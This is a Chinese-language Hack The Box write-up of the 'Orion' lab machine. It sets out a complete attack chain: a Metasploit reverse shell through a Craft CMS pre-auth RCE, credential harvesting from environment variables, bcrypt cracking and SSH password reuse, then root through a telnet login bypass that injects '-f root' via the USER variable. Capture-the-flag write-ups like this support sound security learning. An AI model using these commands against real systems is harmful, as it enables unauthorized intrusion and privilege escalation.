hackthebox-Orion
hackthebox-Orion
Foothold
fscan 扫描

有一个带域名的 302 跳转,配置一下 hosts
10.129.62.192 orion.htb
再次扫描
start infoscan
10.129.62.192:80 open
10.129.62.192:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.129.62.192 code:302 len:154 title:302 Found 跳转url: http://orion.htb/
[*] WebTitle http://orion.htb/ code:200 len:12272 title:Orion Telecom
[+] InfoScan http://orion.htb/ [CMS]
已完成 2/2
[*] 扫描结束,耗时: 2m4.559666451s
结合访问发现,是一个 CraftCMS

使用 searchsploit 发现一个 rce 漏洞

直接拉下来打
searchsploit -m 48492
python 48492.py -u http://10.129.62.192/orion.htb/
发现没有回显,说明没有利用成功
那就网上检索相关的漏洞
首先通过 /admin/login 路由找到 admin 登陆后台,发现服务版本为 Craft CMS 5.6.16

搜索发现存在 CVE-2025-32432 可以未授权 rce
https://www.exploit-db.com/exploits/52525
网上的 poc 的打法都略有区别,尝试了好几个都没打通
msf 中也有这个 cve 的利用

use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432
set RHOSTS orion.htb
set RPORT 80
set LHOST 10.10.16.232
set LPORT 6666
run

有 python3,提一个 full tty shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
User token
进来以后发现权限是 www-data,先枚举一些常规的提权

suid 发现有 pkexec 和 polkit
确认 polkit 版本
dpkg -l policykit-1

版本小于 0.117,可以使用 pwnkit 进行提权
exit 到 meterpreter
upload ./PwnKit
shell
chmod +x ./PwnKit
./PwnKit
发现打不了,应该是被修补了
这是由于 Ubuntu 经常保留上游版本 0.105,只通过 Debian/Ubuntu 包修订号回移安全补丁,所以这里不能只看版本号
sudo 和 capablities 也没有有用的信息,因此考虑存在服务的信息泄露
上传 linpeas 进行枚举
chmod +x linpeas.sh
./linpeas.sh
环境变量中存在数据库信息

CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PASSWORD=SuperSecureCraft123Pass!
CRAFT_DB_USER=root
CRAFT_DB_DATABASE=orion
3306 端口活跃

连接进去看看
mysql -h 127.0.0.1 -P 3306 -u root -p

查询发现 admin 账户
use orion;
show tables;
select * from users;

admin
adam@orion.htb
$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS
给的密码是一个 bcrypt 哈希,可以尝试爆破一下
echo '$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS' > hash.txt
john --wordlist=rockyou.txt hash.txt

darkangel
在 cms 上无法登录

考虑是一个密码复用,尝试用这个密码登录 adam
ssh adam@10.129.62.202 -p 22
成功登录,获取到 user token

Root token
下面继续尝试提权,由于这个账户拿到了密码,可以看看 sudo

没有 sudo 权限
那这里就要考虑服务的漏洞或者内核
此前查看活动端口时,会发现除了 3306 的 mysql,还有 23 和 53 两个端口
53 端口是 DNS,23 端口时 telnet,因此可以关注一下
telnet --version
发现版本为 telnet (GNU inetutils) 2.7,搜索发现版本满足 CVE-2026-24061
跟着网上找到的文章尝试攻击
USER='-f root' telnet -a 127.0.0.1 23
成功提权,拿到 root token

又积累了一个提权

浙公网安备 33010602011771号